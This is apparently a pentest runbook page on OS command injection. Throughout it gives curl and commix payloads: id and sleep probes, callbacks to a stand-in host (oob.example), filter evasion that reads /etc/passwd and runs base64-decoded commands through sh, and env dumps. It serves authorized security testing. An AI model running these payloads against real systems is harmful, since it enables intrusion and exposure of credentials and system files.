Webupdated Oct 1, 2026

Command Injection

Detecting and exploiting OS command injection: metacharacters, blind timing checks, out-of-band callbacks, filter evasion, and impact boundaries.

toolbox:burp suitecommix

A command injection runbook for authorized pentests / bug bounty on in-scope targets only. Goal: find where user input reaches a shell and prove execution with a harmless marker, then map the impact boundary.

1. Map candidate inputs

Anything that shells out is a candidate: ping/traceroute tools, image/PDF converters, backup and export jobs, DNS/WHOIS lookups, filename handling.

# Fingerprint the app and its stack
curl -s -I "https://target.com/" | grep -i -E 'server|x-powered-by'

# Fuzz a suspected parameter for a delay signal
ffuf -u "https://target.com/ping?host=FUZZ" \
  -w /usr/share/seclists/Fuzzing/command-injection.txt \
  -mc all -fs 0 -t 20

2. Confirm with a reflection probe

Start with a unique string, then a metacharacter that produces deterministic output.

# Baseline
curl -s "https://target.com/ping?host=127.0.0.1"

# In-band echo via separators
curl -s "https://target.com/ping?host=127.0.0.1;id"
curl -s "https://target.com/ping?host=127.0.0.1|id"
curl -s "https://target.com/ping?host=127.0.0.1%0aid"
curl -s "https://target.com/ping?host=\$(id)"
curl -s "https://target.com/ping?host=\`id\`"

3. Blind timing proof

When output is not returned, use a measured delay instead of echo.

# Baseline timing
time curl -s "https://target.com/ping?host=127.0.0.1" -o /dev/null

# Delay injection (expect ~5s wall time on success)
time curl -s "https://target.com/ping?host=127.0.0.1;sleep 5" -o /dev/null
time curl -s "https://target.com/ping?host=127.0.0.1%7csleep%205" -o /dev/null

# Compare with a control host that should not delay
time curl -s "https://target.com/ping?host=127.0.0.1;ping -c 5 127.0.0.1" -o /dev/null

4. Out-of-band confirmation

Blind results often mislead; verify with a callback you control.

# Start a listener on your VPS / collaborator domain
# commix can drive the whole interaction
commix --url="https://target.com/ping?host=127.0.0.1" --batch --level=3

# Manual OOB via DNS and HTTP
interakt dns --data "host=127.0.0.1;nslookup \$RANDOM.oob.example"
interakt http --data "host=127.0.0.1;curl http://oob.example/cb"

5. Filter and whitespace evasion

If separators are stripped, vary encoding, quoting, and newlines before giving up.

# Newline-separated commands
curl -s "https://target.com/ping?host=127.0.0.1%0Aid%0A"

# IFS / brace expansion to defeat naive space stripping
curl -s "https://target.com/ping?host=127.0.0.1;cat\${IFS}/etc/passwd"
curl -s "https://target.com/ping?host=127.0.0.1;{cat,/etc/passwd}"

# Base64-encoded payload executed via shell
curl -s "https://target.com/ping?host=127.0.0.1;echo\${IFS}Y2F0IC9ldGMvcGFzc3dk|base64\${IFS}-d|sh"

6. Establish the impact boundary

Prove what the process can reach rather than stopping at id.

curl -s "https://target.com/ping?host=127.0.0.1;id;hostname;uname -a"
curl -s "https://target.com/ping?host=127.0.0.1;env"
curl -s "https://target.com/ping?host=127.0.0.1;cat /etc/hostname;ls -la /"

Full pipeline

# 1. Fingerprint and fuzz a candidate parameter
curl -s -I "https://target.com/" | grep -i -E 'server|x-powered-by'
ffuf -u "https://target.com/ping?host=FUZZ" -w /usr/share/seclists/Fuzzing/command-injection.txt -mc all -fs 0 -t 20

# 2. In-band confirmation
curl -s "https://target.com/ping?host=127.0.0.1;id"
curl -s "https://target.com/ping?host=127.0.0.1|id"

# 3. Blind timing proof with a control
time curl -s "https://target.com/ping?host=127.0.0.1;sleep 5" -o /dev/null

# 4. Automated confirmation and OOB
commix --url="https://target.com/ping?host=127.0.0.1" --batch --level=3
interakt dns --data "host=127.0.0.1;nslookup \$RANDOM.oob.example"

# 5. Impact boundary
curl -s "https://target.com/ping?host=127.0.0.1;id;hostname;uname -a;env"

Ethics & legality

  • Only test parameters and endpoints listed in the program scope or written authorization.
  • Use harmless markers (id, sleep, a callback to your own host) — never weaponized payloads.
  • Respect rate limits and avoid denial-of-service style payloads.
  • Log every request with timestamp and target as evidence for the report.